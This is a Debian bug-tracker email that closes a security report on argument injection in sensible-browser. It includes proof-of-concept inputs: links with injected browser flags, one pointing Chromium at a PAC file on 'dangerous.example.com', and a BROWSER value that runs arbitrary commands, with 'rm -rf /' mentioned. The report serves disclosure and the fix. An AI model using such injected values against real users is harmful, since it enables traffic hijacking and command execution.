Your message dated Wed, 15 Nov 2017 21:10:37 +0000
with message-id <e1ef4xb-000iyy...@fasolo.debian.org>
and subject line Bug#881767: fixed in sensible-utils 0.0.11
has caused the Debian Bug report #881767,
regarding sensible-utils: Argument injection in sensible-browser
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
881767: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: sensible-utils
Version: 0.0.10
Severity: grave
Tags: security
Justification: user security hole
When the BROWSER environment variable is set, an invalid URI can be
used to inject arguments in sensible-browser.
Description
===========
When BROWSER is set, sensible-browser calls the actual browser with:
~~~sh
cmd=$(printf "$i\n" "$URL")
$cmd && exit 0
~~~
If a IFS character is in $URL, this leads to the injection of extra
arguments when calling the actual browser.
For example, this commands triggers the incognito mode of Chromium:
~~~sh
BROWSER=chromium sensible-browser "http://www.example.com/ --incognito
~~~
This URI is invalid but if the caller does not properly validate the
URI, an attacker could add extra arguments when calling the browser.
For example, Emacs might call sensible-browser with an invalid
URI. With this configuration:
~~~elisp
(setq browse-url-browser-function (quote browse-url-generic))
(setq browse-url-generic-program "sensible-browser")
~~~
an org-mode file like this one:
~~~org
[[http://www.yahoo.fr --incognito][test]]
~~~
will trigger the incognito mode of Chromium (this does not happen with
org-mode 8.2.10 shipped in the emacs25 package but it does happen
using org-mode 9.1.2 shipped in the elpa-org package).
While this particular example is not very dangerous other arguments
can be more harmful. For example, it is possible to inject an argument
which overrides the proxy configuration (with a PAC file). This
org-mode link launches Chromium with an alternative PAC file
(silently):
~~~org
[[http://www.example.com/
--proxy-pac-file=http://dangerous.example.com/proxy.pac][test]]
~~~
An attacker could use this type of URI, to forward all the traffic
coming from the browser to a server he's controlling.
Possibles fixes
===============
* A simple fix, would be for sensible-browser to actually check that
the URI parameter does not contain any IFS character (which are not
valid in URI or IRI and fail if it does). It should probably add
extra verification (such as checking that the argument does not
begin by a dash).
* Another solution would be to escape IFS characters.
* The simpler fix would probably to drop support for "%s" in the
BROWSER string: this feature is not supported by other programs
anyway. This is "Alternative Secure BROWSER Definition" in [1].
* Or we could implement "Compatible Secure BROWSER Definition" from
[1] but it may not be very convenient to do in shell.
Moreover, we should probably add some basic URI validation in order to
reject things like:
~~~sh
BROWSER=chromium sensible-browser "--incognito"
~~~
Additional problems
===================
sensible-browser does not handle empty browser in the BROWSER
environment variable:
~~~sh
BROWSER=":chromium" sensible-browser "xterm"
~~~
This command runs xterm (we could have used "rm -rf /").
Similar vulnerabilities in other packages
=========================================
* lilypond
lilypond-invoke-editor is vulnerable to the same argument injection
[2]:
~~~sh
BROWSER="chromium" lilypond-invoke-editor "http://www.example.com/
--incognito"
~~~
Lilypond suggests using it as URI handler [3]:
> When this functionality is active, LilyPond adds hyperlinks to the
> PDF file. These hyperlinks are sent to a ‘URI helper’
> or a web-browser, which opens a text-editor with the cursor in
> the right place.
>
> To make this chain work, you should configure your PDF viewer
> to follow hyperlinks using the ‘lilypond-invoke-editor’
> script supplied with LilyPond.
>
> The program ‘lilypond-invoke-editor’ is a small helper program.
> It will invoke an editor for the special textedit URIs, and run
> a web browser for others. [...]
* xdg-open
xdg-open's 'envvar' implementation (open_envvar) has this same
problem when '%s' is present in $BROWSER:
# Triggers incognito mode:
BROWSER="chromium %s" xdg-open "http://www.example.com/ --incognito"
# Does not trigger incognito mode:
BROWSER="chromium" xdg-open "http://www.example.com/ --incognito"
References
==========
[1] https://www.dwheeler.com/browse/secure_browser.html
[2]
http://sources.debian.net/src/lilypond/2.18.2-9/scripts/lilypond-invoke-editor.scm/#L129
[3]
http://lilypond.org/doc/v2.18/Documentation/usage/configuring-the-system-for-point-and-click
[4] https://specifications.freedesktop.org/desktop-entry-spec/1.1/ar01s06.html
Thanks to Bastien Roucaries for some material and references.
-- System Information:
Debian Release: buster/sid
APT prefers testing
APT policy: (500, 'testing'), (500, 'stable'), (90, 'unstable'), (1,
'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 4.13.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=fr_FR.utf8, LC_CTYPE=fr_FR.utf8 (charmap=UTF-8),
LANGUAGE=fr_FR.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
-- no debconf information
--- End Message ---
--- Begin Message ---
Source: sensible-utils
Source-Version: 0.0.11
We believe that the bug you reported is fixed in the latest version of
sensible-utils, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 881...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bastien Roucariès <ro...@debian.org> (supplier of updated sensible-utils
package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Wed, 15 Nov 2017 16:30:02 +0100
Source: sensible-utils
Binary: sensible-utils
Architecture: source
Version: 0.0.11
Distribution: unstable
Urgency: high
Maintainer: Anibal Monsalve Salazar <ani...@debian.org>
Changed-By: Bastien Roucariès <ro...@debian.org>
Description:
sensible-utils - Utilities for sensible alternative selection
Closes: 289745 881767
Changes:
sensible-utils (0.0.11) unstable; urgency=high
.
* Bug fix: "Argument injection in sensible-browser", thanks to Gabriel
Corona (Closes: #881767). Fixing this bug by not supporting %s
expansion in $BROWSER. Users needing this feature (like running
'firefox -remote "openURL(%s,new-window)"', with %s the URL)
could use a shell wrapper. Remove also multiple browser support.
* Fixing #881767 means not using unsupportable %s in $BROWSER, thus
Closes: #289745.
Checksums-Sha1:
c072b9cd1ea5520027c33e9049d91f3e2379ccd3 1671 sensible-utils_0.0.11.dsc
fe6ceb0ddc2b6ca3b7f360d52f9dbbc3cb531302 61448 sensible-utils_0.0.11.tar.xz
d5a2091f5e972c6664ac3e9e773db40f133c8813 4278
sensible-utils_0.0.11_source.buildinfo
Checksums-Sha256:
00bd8cde4229752593ee06f562f8cd8d91ed3a138b2339417ccd6539e542a5c5 1671
sensible-utils_0.0.11.dsc
f1702bc0c129cfe18fb9ae8c0c7b7aedb5b2e6c0467ab3e1da18a8bbb21fe131 61448
sensible-utils_0.0.11.tar.xz
d301ec9efd77b6e1ae90aa8d92b95712973a64f49eaceab2684d227ec8ccacd1 4278
sensible-utils_0.0.11_source.buildinfo
Files:
7dd672249b9be164ea6a5280c95f50aa 1671 utils required sensible-utils_0.0.11.dsc
43e55555f68935e5a9cd9bd5961f72c2 61448 utils required
sensible-utils_0.0.11.tar.xz
9f06f3e0428cd28ea8afd2a69903f72f 4278 utils required
sensible-utils_0.0.11_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAloMpyIACgkQADoaLapB
CF+0jQ//f2Yky+u0OUoi+3yOG5WmwZFwyGnlyqX38sQiP8nO2+qOYKrh5EY/pjLT
I0N6YSrRoldyAu4zFuC6WKGxmq7bxNlrhsgfCs8l1H2R/aqXeIuMfiL7tF90xW1l
lt9CMYzNClaMXmBVaU/E1JJ9Ei4+qmn8HEnDawfER3WX6aiIdNtvnXzAqG1PrGkT
Tvi5sxnbLXP6cMsx4RsvdAEmzJ9eVwivt8dxIugel3tBFK9dibm/I8HqLcDvDHVQ
sU1iHTwuqsNckkQDzE61YFbnOQ0abcVeeVg+5zqGv2mfgY0vFPb0P7eamarV0rpN
HUQMJyu2xZgcUzg3cUBUfzrBYc/Ien4DjHbKRhMe1pM063wyoimhjfVvk7LmL/pW
esUQTdvIU3yE1KVbs07fuysT/7V2CW8Bd37G18sPZEFxrXnURiSvTvxuiGRESdFr
mE8fB3aD65ZVLmMOCQwIpWNxE2FTOKuhiN48MBPZIxzxfena9lgJzv23eDk2bMrK
x5GFODcVwAc5hBDOTuZbgp91n1U8U7XzPLxgjG5dXgS00LMndb+8EC9061geMReQ
kyIYMPGLvfzP4T5JsT/emBGktcpxqMCO0m4drfvR1ABAdD/88RpNFr4hp3cgwr3H
gHUaSe8WP8JGKYw9BwC4dkDgvkZXg6t2dnp+JvHQpeHyqzqOfHY=
=mbfr
-----END PGP SIGNATURE-----
--- End Message ---